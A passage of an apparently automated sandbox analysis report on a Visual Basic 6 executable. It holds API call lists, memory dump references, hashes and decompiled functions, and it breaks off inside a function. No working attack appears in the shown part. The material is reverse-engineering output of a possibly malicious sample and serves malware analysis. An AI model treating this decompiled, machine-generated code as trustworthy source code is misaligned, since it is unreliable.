                                                        • Instruction Fuzzy Hash: C4517274A00219AFDB14DF95CD48EEEBBB8FF48704F008119F951E72A1D778A846CB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041F1FB
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041F20C
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041F217
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041124C,00000028), ref: 0041F23D
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041F254
                                                        • __vbaFreeObj.MSVBVM60(?,?), ref: 0041F266
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041F26F
                                                        • __vbaCastObj.MSVBVM60(00000000,0041124C), ref: 0041F27B
                                                        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F283
                                                        • __vbaCastObj.MSVBVM60(00000000,0041124C), ref: 0041F292
                                                        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F29A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CastCheckHresult$Text
                                                        • String ID:
                                                        • API String ID: 487687974-0
                                                        • Opcode ID: a4fe69aefbc4864d75cfec748256471c64bd308027906ef8e81739ba6c92d51e
                                                        • Instruction ID: f954da8628ce93caaaefef3ca969f1f44cfc29d794eb5d758d5a8779969d0332
                                                        • Opcode Fuzzy Hash: a4fe69aefbc4864d75cfec748256471c64bd308027906ef8e81739ba6c92d51e
                                                        • Instruction Fuzzy Hash: 65312D75D00208ABCB049F95DD89DEEBBB8EF58700B10815AF511F71A1D7786946CF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E26B
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E27C
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E287
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411158,00000024), ref: 0041E2AD
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041E2C4
                                                        • __vbaFreeObj.MSVBVM60(?,?), ref: 0041E2D6
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E2DF
                                                        • __vbaCastObj.MSVBVM60(00000000,00411158), ref: 0041E2EB
                                                        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041E2F3
                                                        • __vbaCastObj.MSVBVM60(00000000,00411158), ref: 0041E302
                                                        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041E30A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Free$CastCheckHresult$Text
                                                        • String ID:
                                                        • API String ID: 487687974-0
                                                        • Opcode ID: 2c01fdd9468ded3a79b0bbbf3a1152e3a084904c1e8a70a199185aff6e3e5529
                                                        • Instruction ID: 4201e1f4fb133b764ed51ee68f79bda269d9589fa57d42cf3489bc47036d5ddb
                                                        • Opcode Fuzzy Hash: 2c01fdd9468ded3a79b0bbbf3a1152e3a084904c1e8a70a199185aff6e3e5529
                                                        • Instruction Fuzzy Hash: 57314B75D40208ABCB04DFA6DD899EEBBBCEF58700B10801AFA12B7260D7785945CF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,00000000,72A1A274), ref: 004244C0
                                                        • #537.MSVBVM60(00000022), ref: 004244CE
                                                        • __vbaStrMove.MSVBVM60 ref: 004244DB
                                                        • __vbaStrCat.MSVBVM60(?,00000000), ref: 004244E8
                                                        • __vbaStrMove.MSVBVM60 ref: 004244EF
                                                        • #537.MSVBVM60(00000022,00000000), ref: 004244F4
                                                        • __vbaStrMove.MSVBVM60 ref: 004244FB
                                                        • __vbaStrCat.MSVBVM60(00000000), ref: 004244FE
                                                        • __vbaStrMove.MSVBVM60 ref: 00424505
                                                        • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00424515
                                                        • __vbaFreeStr.MSVBVM60(00424556), ref: 0042454F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Move$#537Free$CopyList
                                                        • String ID:
                                                        • API String ID: 1274409727-0
                                                        • Opcode ID: 5f7312e8f01affa2c88811be5faa8aa1fa9f33ac8247d51851b76aa7fbad4ad8
                                                        • Instruction ID: f493d40b7015ae32eb3e41f5dc42a2e48cf5a5ac9014bc306b0c70572c1fd617
                                                        • Opcode Fuzzy Hash: 5f7312e8f01affa2c88811be5faa8aa1fa9f33ac8247d51851b76aa7fbad4ad8
                                                        • Instruction Fuzzy Hash: D2112E71D00208AFCB00EFA4DD45AEEBBB8EF5C700F10402AE505F7260EA746905CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041868C
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041869F
                                                        • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004186A8
                                                        • __vbaSetSystemError.MSVBVM60(00080009,0000000C,00000000,00000000), ref: 004186BE
                                                        • __vbaStrToUnicode.MSVBVM60(004015A0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004186C9
                                                        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004186D8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401538,0040F430,00000390), ref: 00418719
                                                        • __vbaFreeStr.MSVBVM60(0041873A,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418733
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CopyFree$AnsiCheckErrorHresultSystemUnicode
                                                        • String ID: Text
                                                        • API String ID: 706850715-2612594937
                                                        • Opcode ID: dce327fcc03a66a133f3cfaa2aa545bcfa7c086e13176e0a16847a1dd296753c
                                                        • Instruction ID: 11358420491c432dafd8a14dd56769f386c4476c9d9c733996ee30f45fde3063
                                                        • Opcode Fuzzy Hash: dce327fcc03a66a133f3cfaa2aa545bcfa7c086e13176e0a16847a1dd296753c
                                                        • Instruction Fuzzy Hash: 1D313E74900205AFCB04DF69C949AAEFBB8FF58700F10852EE555A7690DB78A445CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 20%
                                                        			E00416890(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				char _v24;
                                                        				char _v28;
                                                        				intOrPtr _v32;
                                                        				void* _t39;
                                                        				intOrPtr* _t41;
                                                        				void* _t42;
                                                        				intOrPtr _t43;
                                                        				intOrPtr* _t49;
                                                        				intOrPtr _t51;
                                                        				intOrPtr* _t58;
                                                        				intOrPtr* _t59;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr* _t79;
                                                        				intOrPtr* _t80;
                                                        				intOrPtr* _t82;
                                                        				void* _t85;
                                                        				intOrPtr _t86;
                                                        
                                                        				_t86 = _t85 - 8;
                                                        				_push(0x401d26);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t86;
                                                        				_v12 = _t86 - 0x18;
                                                        				_v8 = 0x401360;
                                                        				_t82 = _a4;
                                                        				_v24 = 0;
                                                        				_v28 = 0;
                                                        				if( *((intOrPtr*)(_t82 + 0x70)) == 0) {
                                                        					_t79 = __imp____vbaSetSystemError;
                                                        				} else {
                                                        					_t49 =  *((intOrPtr*)( *_t82 + 0x3b0))(_t82);
                                                        					__imp____vbaObjSet( &_v24, _t49);
                                                        					_t80 = _t49;
                                                        					_t51 =  *((intOrPtr*)( *_t80 + 0x1c0))(_t80,  &_v28);
                                                        					asm("fclex");
                                                        					if(_t51 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t51, _t80, 0x410414, 0x1c0);
                                                        					}
                                                        					_t60 = _t82 + 0x84;
                                                        					E0041006C();
                                                        					_t79 = __imp____vbaSetSystemError;
                                                        					_v32 = _t51;
                                                        					 *_t79(_v28, _t60);
                                                        					 *((intOrPtr*)(_t82 + 0x80)) = _v32;
                                                        					__imp____vbaFreeObj();
                                                        					E0040F790();
                                                        					 *_t79( *((intOrPtr*)(_t82 + 0x70)), 0,  *_t60,  *((intOrPtr*)(_t82 + 0x88)),  *((intOrPtr*)(_t82 + 0x8c)),  *((intOrPtr*)(_t82 + 0x90)), 0x14);
                                                        				}
                                                        				if( *((intOrPtr*)(_t82 + 0x74)) != 0) {
                                                        					_t41 =  &_v24;
                                                        					__imp____vbaObjSet(_t41,  *((intOrPtr*)( *_t82 + 0x3ac))(_t82));
                                                        					_t58 = _t41;
                                                        					_t42 =  *((intOrPtr*)( *_t58 + 0x1c0))(_t58,  &_v28);
                                                        					asm("fclex");
                                                        					if(_t42 < 0) {
                                                        						__imp____vbaHresultCheckObj(_t42, _t58, 0x410414, 0x1c0);
                                                        					}
                                                        					_t43 = _v28;
                                                        					_t59 = _t82 + 0x94;
                                                        					E0041006C();
                                                        					_v32 = _t43;
                                                        					 *_t79(_t43, _t59);
                                                        					 *((intOrPtr*)(_t82 + 0x80)) = _v32;
                                                        					__imp____vbaFreeObj();
                                                        					E0040F790();
                                                        					 *_t79( *((intOrPtr*)(_t82 + 0x74)), 0,  *_t59,  *((intOrPtr*)(_t82 + 0x98)),  *((intOrPtr*)(_t82 + 0x9c)),  *((intOrPtr*)(_t82 + 0xa0)), 0x14);
                                                        				}
                                                        				_t39 =  *((intOrPtr*)( *_t82 + 0x8b4))(_t82);
                                                        				_push(0x416a13);
                                                        				return _t39;
                                                        			}






















                                                        0x00416893
                                                        0x00416896
                                                        0x004168a1
                                                        0x004168a2
                                                        0x004168af
                                                        0x004168b2
                                                        0x004168b9
                                                        0x004168be
                                                        0x004168c1
                                                        0x004168c7
                                                        0x0041695e
                                                        0x004168cd
                                                        0x004168d0
                                                        0x004168db
                                                        0x004168e1
                                                        0x004168ea
                                                        0x004168f2
                                                        0x004168f4
                                                        0x00416902
                                                        0x00416902
                                                        0x0041690b
                                                        0x00416913
                                                        0x00416918
                                                        0x0041691e
                                                        0x00416921
                                                        0x00416929
                                                        0x0041692f
                                                        0x00416955
                                                        0x0041695a
                                                        0x0041695a
                                                        0x00416969
                                                        0x00416979
                                                        0x0041697d
                                                        0x00416983
                                                        0x0041698c
                                                        0x00416994
                                                        0x00416996
                                                        0x004169a4
                                                        0x004169a4
                                                        0x004169aa
                                                        0x004169ad
                                                        0x004169b5
                                                        0x004169ba
                                                        0x004169bd
                                                        0x004169c2
                                                        0x004169cb
                                                        0x004169f1
                                                        0x004169f6
                                                        0x004169f6
                                                        0x004169fb
                                                        0x00416a01
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401D26), ref: 004168DB
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0,?,?,?,?,?,?,?,?,00401D26), ref: 00416902
                                                        • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416921
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 0041692F
                                                        • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,00000014,?,?,?,?,?,?,?,?,00401D26), ref: 0041695A
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401D26), ref: 0041697D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0,?,?,?,?,?,?,?,?,00401D26), ref: 004169A4
                                                        • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004169BD
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004169CB
                                                        • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,00000014,?,?,?,?,?,?,?,?,00401D26), ref: 004169F6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$ErrorSystem$CheckFreeHresult
                                                        • String ID:
                                                        • API String ID: 3470325077-0
                                                        • Opcode ID: 3e37ed51ec3eab2260e1e8d93aa247695829d60059629668c722d6bf01ebe3c5
                                                        • Instruction ID: 436ae83611ac3ab763441565944a166f388d92644671e6a115ce87b9a393c64e
                                                        • Opcode Fuzzy Hash: 3e37ed51ec3eab2260e1e8d93aa247695829d60059629668c722d6bf01ebe3c5
                                                        • Instruction Fuzzy Hash: F5415DB0900609AFD710DFA4C985FEBB7F8FF48700F108529F686E7251DB74A8458BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaSetSystemError.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422252
                                                        • __vbaSetSystemError.MSVBVM60(?,?,00000008,?,00000008), ref: 0042226F
                                                        • #685.MSVBVM60(?,00000008,?,00000008), ref: 00422277
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,00000008,?,00000008), ref: 0042227E
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004119EC,0000004C,?,00000008,?,00000008), ref: 0042229F
                                                        • __vbaFreeObj.MSVBVM60(?,00000008,?,00000008), ref: 004222B6
                                                        • #685.MSVBVM60(?,00000008,?,00000008), ref: 004222CD
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,00000008,?,00000008), ref: 004222D4
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004119EC,0000004C,?,00000008,?,00000008), ref: 004222F5
                                                        • __vbaFreeObj.MSVBVM60(?,00000008,?,00000008), ref: 0042230C
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$#685CheckErrorFreeHresultSystem
                                                        • String ID:
                                                        • API String ID: 3872544020-0
                                                        • Opcode ID: af78cd6ba52e7d9bc5289ce7886ded48ffdc8ff9f1db35df46dd3f1528e76402
                                                        • Instruction ID: c71af55f8ef969f0d82e6d7f33767a1e66a9333ad20b365ad60b9d01497f40b0
                                                        • Opcode Fuzzy Hash: af78cd6ba52e7d9bc5289ce7886ded48ffdc8ff9f1db35df46dd3f1528e76402
                                                        • Instruction Fuzzy Hash: FE416F75A01215ABDB10DFA5CA859DFBBB8FF4C740B50452AE941F7250D7789C40CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,00000000,00401690), ref: 0041D443
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,0000001C), ref: 0041D467
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D470
                                                        • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D484
                                                        • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D497
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000020), ref: 0041D4B3
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D4BC
                                                        • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D4D2
                                                        • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D4D9
                                                        • __vbaFreeObj.MSVBVM60(0041D509,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D502
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$New2$Free$CheckHresult$Addref
                                                        • String ID:
                                                        • API String ID: 2032624950-0
                                                        • Opcode ID: 15a05a22236c11a641ae1816682f5b1709ae9fb9ece815951c33b63d200af556
                                                        • Instruction ID: d158ac7346c3867bacecfea32575f4cecfbfdf00a72e3fb2d8eb31f6f13ebce5
                                                        • Opcode Fuzzy Hash: 15a05a22236c11a641ae1816682f5b1709ae9fb9ece815951c33b63d200af556
                                                        • Instruction Fuzzy Hash: 64312470940249BBDB10DF95CD85EEFBBB8EF98700F104025F645A31A0D778A485CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 876193936b14b27d79bbad5298ff1112646e7665e293d5956e63d336490d79ff
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 0C313D38E511289BCB04DB98CD80AED7BB5FF5C340B508027D502777A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 16%
                                                        			E00415C70(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				char _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v44;
                                                        				intOrPtr* _t25;
                                                        				void* _t27;
                                                        				void* _t30;
                                                        				intOrPtr* _t44;
                                                        				intOrPtr* _t45;
                                                        				intOrPtr* _t47;
                                                        				void* _t48;
                                                        				void* _t50;
                                                        				intOrPtr _t51;
                                                        				intOrPtr _t52;
                                                        
                                                        				_t51 = _t50 - 0xc;
                                                        				 *[fs:0x0] = _t51;
                                                        				_t52 = _t51 - 0x28;
                                                        				_v16 = _t52;
                                                        				_v12 = 0x401340;
                                                        				_v8 = 0;
                                                        				_t47 = _a4;
                                                        				 *((intOrPtr*)( *_t47 + 4))(_t47, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t48);
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				__imp____vbaStrCopy();
                                                        				_t25 =  *((intOrPtr*)( *_t47 + 0x3b0))(_t47);
                                                        				__imp____vbaObjSet( &_v32, _t25);
                                                        				_t44 = _t25;
                                                        				_t27 =  *((intOrPtr*)( *_t44 + 0x23c))(_t44, _v28);
                                                        				asm("fclex");
                                                        				if(_t27 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t27, _t44, 0x410414, 0x23c);
                                                        				}
                                                        				__imp____vbaFreeObj();
                                                        				_t45 = _t52 - 0x10;
                                                        				 *_t45 = 8;
                                                        				 *((intOrPtr*)(_t45 + 4)) = _v44;
                                                        				 *(_t45 + 8) = L"ToolTipText";
                                                        				 *((intOrPtr*)(_t45 + 0xc)) = _v36;
                                                        				_t30 =  *((intOrPtr*)( *_t47 + 0x390))(_t47);
                                                        				asm("fclex");
                                                        				if(_t30 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t30, _t47, 0x40f430, 0x390);
                                                        				}
                                                        				__imp____vbaFreeStr(0x415d59);
                                                        				return _t30;
                                                        			}




















                                                        0x00415c73
                                                        0x00415c82
                                                        0x00415c89
                                                        0x00415c8f
                                                        0x00415c92
                                                        0x00415c9b
                                                        0x00415c9e
                                                        0x00415ca4
                                                        0x00415cad
                                                        0x00415cb0
                                                        0x00415cb3
                                                        0x00415cbc
                                                        0x00415cc7
                                                        0x00415cd0
                                                        0x00415cd6
                                                        0x00415cde
                                                        0x00415ce0
                                                        0x00415cee
                                                        0x00415cee
                                                        0x00415cf7
                                                        0x00415d05
                                                        0x00415d0f
                                                        0x00415d14
                                                        0x00415d17
                                                        0x00415d1d
                                                        0x00415d20
                                                        0x00415d28
                                                        0x00415d2a
                                                        0x00415d38
                                                        0x00415d38
                                                        0x00415d52
                                                        0x00415d58

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415CB3
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415CC7
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000023C), ref: 00415CEE
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415CF7
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401340,0040F430,00000390), ref: 00415D38
                                                        • __vbaFreeStr.MSVBVM60(00415D59,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415D52
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$Copy
                                                        • String ID: ToolTipText
                                                        • API String ID: 2714663509-1021058858
                                                        • Opcode ID: 1f255d4b518208c9a6b42715e43c61880ae14d4f20628a28c6d47aff8d44e0f5
                                                        • Instruction ID: 33de4cc99446451a3635e04d7da42baef83112a3494888afb963685ac4157390
                                                        • Opcode Fuzzy Hash: 1f255d4b518208c9a6b42715e43c61880ae14d4f20628a28c6d47aff8d44e0f5
                                                        • Instruction Fuzzy Hash: 2C216D70900209EFCB049F99CA89AEEBBB8FF58700F208529F505E32A0D7786945CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 23%
                                                        			E0041CCA0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                                                        				signed int _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v48;
                                                        				signed int _v64;
                                                        				intOrPtr _v68;
                                                        				signed int _v72;
                                                        				intOrPtr _v76;
                                                        				char _v80;
                                                        				short _v84;
                                                        				short _t46;
                                                        				void* _t47;
                                                        				intOrPtr* _t49;
                                                        				char* _t53;
                                                        				void* _t54;
                                                        				intOrPtr* _t70;
                                                        				signed int _t73;
                                                        				intOrPtr* _t74;
                                                        				signed int _t76;
                                                        				signed int _t77;
                                                        				void* _t78;
                                                        				void* _t80;
                                                        				intOrPtr _t81;
                                                        				intOrPtr _t82;
                                                        
                                                        				_t81 = _t80 - 0xc;
                                                        				 *[fs:0x0] = _t81;
                                                        				_t82 = _t81 - 0x48;
                                                        				_v16 = _t82;
                                                        				_v12 = 0x4016f0;
                                                        				_t76 = _a4;
                                                        				_v8 = _t76 & 0x00000001;
                                                        				_t77 = _t76 & 0xfffffffe;
                                                        				_a4 = _t77;
                                                        				 *((intOrPtr*)( *_t77 + 4))(_t77, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t78);
                                                        				_t7 = _t77 + 0x34; // 0x401724
                                                        				_t56 = _t7;
                                                        				_t73 = 0;
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				_v48 = 0;
                                                        				_v64 = 0;
                                                        				_v80 = 0;
                                                        				E0041DA00(_t7, 0, _t77,  &_v48, _t7);
                                                        				_t46 =  &_v48;
                                                        				_v72 = 0;
                                                        				_v80 = 0x800b;
                                                        				__imp____vbaVarTstEq( &_v80, _t46);
                                                        				_v84 = _t46;
                                                        				__imp____vbaFreeVar();
                                                        				if(_v84 != 0) {
                                                        					_t49 =  &_v32;
                                                        					__imp____vbaObjSet(_t49,  *((intOrPtr*)( *_t77 + 0x30c))(_t77));
                                                        					_t74 = _t49;
                                                        					_v72 = 0x80020004;
                                                        					_v80 = 0xa;
                                                        					E0041D830(_t56, _t74, _t77,  &_v48, _t56);
                                                        					_t70 = _t82 - 0x10;
                                                        					 *_t70 = _v80;
                                                        					 *((intOrPtr*)(_t70 + 4)) = _v76;
                                                        					 *((intOrPtr*)(_t70 + 8)) = _v72;
                                                        					_t53 =  &_v28;
